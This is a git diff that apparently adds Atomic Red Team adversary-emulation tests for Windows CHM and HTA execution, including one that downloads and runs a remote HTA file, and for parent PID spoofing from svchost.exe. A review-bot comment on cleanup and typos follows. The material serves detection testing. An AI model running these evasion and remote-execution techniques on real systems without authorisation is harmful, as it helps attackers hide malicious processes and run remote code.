+ description: Executes a CHM file simulating a user double click.
+ supported_platforms:
+ - windows
+ input_arguments:
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
+ name: powershell
+ - name: Invoke CHM with Script Engine and Help Topic
+ auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5
+ description: Executes a CHM file with a defined script engine, ITS Protocol
+ Handler, and help topic extension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ topic_extension:
+ description: Default Help Topic
+ type: string
+ default: html
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: "$env:windir\\hh.exe"
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ script_engine:
+ description: Default Script Engine
+ type: string
+ default: JScript
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler
+ #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
+ #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+ - name: Invoke CHM Shortcut Command with ITS and Help Topic
+ auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247
+ description: Executes a CHM file using the Shortcut Command method with a defined
+ ITS Protocol Handler, and help topic extension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ topic_extension:
+ description: Default Help Topic
+ type: string
+ default: html
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: "$env:windir\\hh.exe"
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler
+ #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
+ #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
T1542.002:
technique:
external_references:
@@ -28845,6 +29141,196 @@ defense-evasion:
'
name: powershell
+ - name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral
+ Movement
+ auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447
+ description: Executes an HTA Application using JScript script engine using local
+ UNC path simulating lateral movement.
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ hta_file_path:
+ description: HTA file name and or path to be used
+ type: string
+ default: Test.hta
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: "$env:windir\\system32\\mshta.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine
+ #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath
+ #{mshta_file_path}'
+ name: powershell
+ - name: Invoke HTML Application - Jscript Engine Simulating Double Click
+ auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33
+ description: Executes an HTA Application using JScript script engine simulating
+ double click.
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ hta_file_path:
+ description: HTA file name and or path to be used
+ type: string
+ default: Test.hta
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine
+ #{script_engine} -SimulateUserDoubleClick'
+ name: powershell
+ - name: Invoke HTML Application - Direct download from URI
+ auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db
+ description: Executes an HTA Application by directly downloading from remote
+ URI.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: "$env:windir\\system32\\mshta.exe"
+ hta_uri:
+ description: URI to HTA
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+ - name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol
+ Handler
+ auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af
+ description: Executes an HTA Application with JScript Engine, Rundll32 and Inline
+ Protocol Handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ rundll32_file_path:
+ description: Location of rundll32.exe
+ type: string
+ default: "$env:windir\\system32\\rundll32.exe"
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ protocol_handler:
+ description: Protocol Handler to use
+ type: string
+ default: About
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
+ #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}'
+ name: powershell
+ - name: Invoke HTML Application - JScript Engine with Inline Protocol Handler
+ auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+ description: Executes an HTA Application with JScript Engine and Inline Protocol
+ Handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: "$env:windir\\system32\\mshta.exe"
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ protocol_handler:
+ description: Protocol Handler to use
+ type: string
+ default: About
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
+ #{protocol_handler} -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+ - name: Invoke HTML Application - Simulate Lateral Movement over UNC Path
+ auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362
+ description: Executes an HTA Application with Simulate lateral movement over
+ UNC Path.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: "$env:windir\\system32\\mshta.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath
+ #{mshta_file_path}'
+ name: powershell
T1218.007:
technique:
created: '2020-01-24T14:38:49.266Z'
@@ -29744,6 +30230,134 @@ defense-evasion:
Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
+ - name: Parent PID Spoofing - Spawn from Current Process
+ auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
+ description: Spawns a powershell.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: "$PID"
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
+ ''#{command_line}'' -ParentId #{parent_pid}'
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from Specified Process
+ auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
+ description: Spawns a notepad.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: "$PID"
+ test_guid:
+ description: Defined test GUID
+ type: string
+ default: 12345678-1234-1234-1234-123456789123
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid
+ #{test_guid}'
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from svchost.exe
+ auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
+ description: Spawnd a process as a child of the first accessible svchost.exe
+ process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
+ ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
+ Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path}
+ -CommandLine ''#{command_line}'''
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from New Process
+ auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
+ description: Creates a notepad.exe process and then spawns a powershell.exe
+ process as a child of it.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ parent_name:
+ description: Parent process to spoof from
+ type: path
+ default: "$Env:windir\\System32\\notepad.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
+ -FilePath #{file_path} -CommandLine ''#{command_line}'''
+ name: powershell
T1550.002:
technique:
external_references:
diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md
index c764764d..4e26c477 100644
--- a/atomics/T1134.004/T1134.004.md
+++ b/atomics/T1134.004/T1134.004.md
@@ -10,6 +10,14 @@ Explicitly assigning the PPID may also enable elevated privileges given appropri
- [Atomic Test #1 - Parent PID Spoofing using PowerShell](#atomic-test-1---parent-pid-spoofing-using-powershell)
+- [Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process](#atomic-test-2---parent-pid-spoofing---spawn-from-current-process)
+
+- [Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process](#atomic-test-3---parent-pid-spoofing---spawn-from-specified-process)
+
+- [Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe](#atomic-test-4---parent-pid-spoofing---spawn-from-svchostexe)
+
+- [Atomic Test #5 - Parent PID Spoofing - Spawn from New Process](#atomic-test-5---parent-pid-spoofing---spawn-from-new-process)
+
@@ -67,4 +75,182 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
+
+
+
+## Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process
+Spawns a powershell.exe process as a child of the current process.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe|
+| parent_pid | PID of process to spawn from | string | $PID|
+| command_line | Specified command line to use | string | -Command Start-Sleep 10|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process
+Spawns a notepad.exe process as a child of the current process.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| parent_pid | PID of process to spawn from | string | $PID|
+| test_guid | Defined test GUID | string | 12345678-1234-1234-1234-123456789123|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe
+Spawnd a process as a child of the first accessible svchost.exe process.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command_line | Specified command line to use | string | -Command Start-Sleep 10|
+| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = 'svchost.exe' AND CommandLine LIKE '%'" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - Parent PID Spoofing - Spawn from New Process
+Creates a notepad.exe process and then spawns a powershell.exe process as a child of it.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command_line | Specified command line to use | string | -Command Start-Sleep 10|
+| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe|
+| parent_name | Parent process to spoof from | path | $Env:windir\System32\notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
diff --git a/atomics/T1134.004/T1134.004.yaml b/atomics/T1134.004/T1134.004.yaml
index 78af0ff1..f8d817d8 100644
--- a/atomics/T1134.004/T1134.004.yaml
+++ b/atomics/T1134.004/T1134.004.yaml
@@ -51,3 +51,114 @@ atomic_tests:
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
+- name: Parent PID Spoofing - Spawn from Current Process
+ auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
+ description: Spawns a powershell.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: $PID
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: -Command Start-Sleep 10
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: "Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}"
+ name: powershell
+
+- name: Parent PID Spoofing - Spawn from Specified Process
+ auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
+ description: Spawns a notepad.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: $PID
+ test_guid:
+ description: Defined test GUID
+ type: string
+ default: 12345678-1234-1234-1234-123456789123
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}'
+ name: powershell
+
+- name: Parent PID Spoofing - Spawn from svchost.exe
+ auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
+ description: Spawnd a process as a child of the first accessible svchost.exe process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: -Command Start-Sleep 10
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: "Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter \"Name = 'svchost.exe' AND CommandLine LIKE '%'\" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'"
+ name: powershell
+
+- name: Parent PID Spoofing - Spawn from New Process
+ auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
+ description: Creates a notepad.exe process and then spawns a powershell.exe process as a child of it.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: -Command Start-Sleep 10
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+ parent_name:
+ description: Parent process to spoof from
+ type: path
+ default: $Env:windir\System32\notepad.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: "Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'"
+ name: powershell
\ No newline at end of file
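Review bot: The `Parent PID Spoofing - Spawn from New Process` test starts notepad.exe with `Start-Process -FilePath #{parent_name} -PassThru` but defines no `cleanup_command`, so the spoofed parent is left running after the test, whereas the existing test in this file stops what it spawned (`Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore` in the hunk's leading context); adding `cleanup_command: Stop-Process -Name notepad -ErrorAction Ignore` under that test's `executor` would follow the file's convention, accepting the same by-name breadth the existing cleanup has. The `Spawn from svchost.exe` description reads `Spawnd a process`; it should be `Spawns a process`, and since the index and markdown hunks earlier in this commit are copies of this text they will need regenerating after the fix. The `Spawn from Specified Process` description says a notepad.exe process is spawned, but its command passes only `-ParentId` and `-TestGuid`, so the notepad claim appears to rest on the harness's default and is worth stating explicitly or dropping. The file also ends without a trailing newline (`\ No newline at end of file`), which the other atomic YAML files keep.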
diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md
index dd94ab0a..ef702c12 100644
--- a/atomics/T1218.001/T1218.001.md
+++ b/atomics/T1218.001/T1218.001.md
@@ -10,6 +10,16 @@ A custom CHM file containing embedded payloads could be delivered to a victim th
- [Atomic Test #2 - Compiled HTML Help Remote Payload](#atomic-test-2---compiled-html-help-remote-payload)
+- [Atomic Test #3 - Invoke CHM with default Shortcut Command Execution](#atomic-test-3---invoke-chm-with-default-shortcut-command-execution)
+
+- [Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler](#atomic-test-4---invoke-chm-with-infotech-storage-protocol-handler)
+
+- [Atomic Test #5 - Invoke CHM Simulate Double click](#atomic-test-5---invoke-chm-simulate-double-click)
+
+- [Atomic Test #6 - Invoke CHM with Script Engine and Help Topic](#atomic-test-6---invoke-chm-with-script-engine-and-help-topic)
+
+- [Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic](#atomic-test-7---invoke-chm-shortcut-command-with-its-and-help-topic)
+
@@ -83,4 +93,229 @@ hh.exe #{remote_chm_file}
+
+
+
+## Atomic Test #3 - Invoke CHM with default Shortcut Command Execution
+Executes a CHM file with the default Shortcut Command method.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| chm_file_path | Default path of CHM | string | Test.chm|
+| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler
+Executes a CHM file with the ITS protocol handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
+| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
